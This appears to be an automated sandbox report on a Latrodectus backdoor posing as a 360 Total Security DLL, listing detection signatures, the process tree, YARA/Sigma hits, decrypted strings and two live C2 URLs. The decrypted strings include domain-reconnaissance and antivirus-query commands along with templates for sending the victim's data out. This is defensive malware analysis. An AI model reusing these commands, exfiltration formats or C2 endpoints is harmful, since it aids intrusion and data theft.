Edit tour

Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name:	360total.dll.dll (renamed file extension from exe to dll)
Original sample name:	360total.dll.exe
Analysis ID:	1431883
MD5:	74143402c40ac2e61e9f040a2d7e2d00
SHA1:	4053dc85bb86c47c63f96681d6a62c21cd6342a3
SHA256:	1625ac230aa5ca950573f3ba0b1a7bd4c7fbd3e3686f9ecd4a40f1504bf33a11
Tags:	exe
Infos:

Detection

Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

System process connects to network (likely due to code injection or exploit)

Yara detected Latrodectus

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sleep reduction / modifications

Deletes itself after installation

PE file contains section with special chars

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses ipconfig to lookup or modify the Windows network settings

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 6340 cmdline: loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)

conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6484 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

rundll32.exe (PID: 4616 cmdline: rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 2928 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1 MD5: EF3179D498793BF4234F708D3BE28633)

cmd.exe (PID: 4580 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 2764 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 2696 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 2968 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 1476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 6348 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 4464 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 3440 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 4404 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 4396 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 3252 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

rundll32.exe (PID: 5572 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject MD5: EF3179D498793BF4234F708D3BE28633)

WerFault.exe (PID: 4856 cmdline: C:\Windows\system32\WerFault.exe -u -p 5572 -s 452 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 1848 cmdline: C:\Windows\system32\WerFault.exe -u -p 5572 -s 472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

rundll32.exe (PID: 3396 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 3964 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39 https://twitter.com/Myrtus0x0/status/1732997981866209550 https://www.embeeresearch.io/latrodectus-script-deobfuscation/	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Process Memory Space: rundll32.exe PID: 2928	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.memstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.26c61e20000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
4.2.rundll32.exe.20342fe0000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
4.2.rundll32.exe.20342fe0000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
4.2.rundll32.exe.203431c0000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
9.2.rundll32.exe.22380120000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.2.rundll32.exe.26c61e20000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.2.rundll32.exe.26c61e10000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
4.2.rundll32.exe.203431c0000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
9.2.rundll32.exe.22380130000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
9.2.rundll32.exe.22380120000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
9.2.rundll32.exe.22380130000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
3.2.rundll32.exe.26c61e10000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4396, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 3252, ProcessName: net.exe

Sigma detected: Share And Session Enumeration Using Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4396, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 3252, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1 , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2928, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 4580, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.rundll32.exe.22380120000.1.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Sample uses string decryption to hide its real strings

Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c ipconfig /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c systeminfo
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c net view /all /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c net view /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &ipconfig=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c net config workstation
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /c whoami /groups
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &systeminfo=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &domain_trusts=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &domain_trusts_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &net_view_all_domain=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &net_view_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &net_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &wmic=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &net_config_ws=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &net_wmic_av=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &whoami_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &proclist=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &desklinks=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: .
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Update_%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Custom_update
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: .dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Updater
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: rundll32.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: "%s", %s %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: runnung
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: :wtfbbq
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %s%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: files/bp.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %s\%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %d.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %s\%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: init -zzzz="%s\%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: front
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: /files/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Facial
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: !"$%&()*wp
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: POST
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: GET
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: curl/7.88.1
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: CLEARURL
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: COMMAND
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: ERROR
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: <html>
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: <!DOCTYPE
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %s%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: 12345
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &stiller=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %s%d.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: LogonTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %x%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: TimeTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: PT0H%02dM
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &mac=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: :%02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: PT0S
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &computername=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: &domain=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: \*.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: \Registry\Machine\
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: https://jarinamaers.shop/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: https://wrankaget.site/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Desktop
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Startup
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Personal
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Local AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: \update_data.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack	String decryptor: URLS\|%d\|%s

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

3_2_000000018003BC0C

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2

Source:

Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_0000022380131A08

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.219.28 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://wrankaget.site/live/

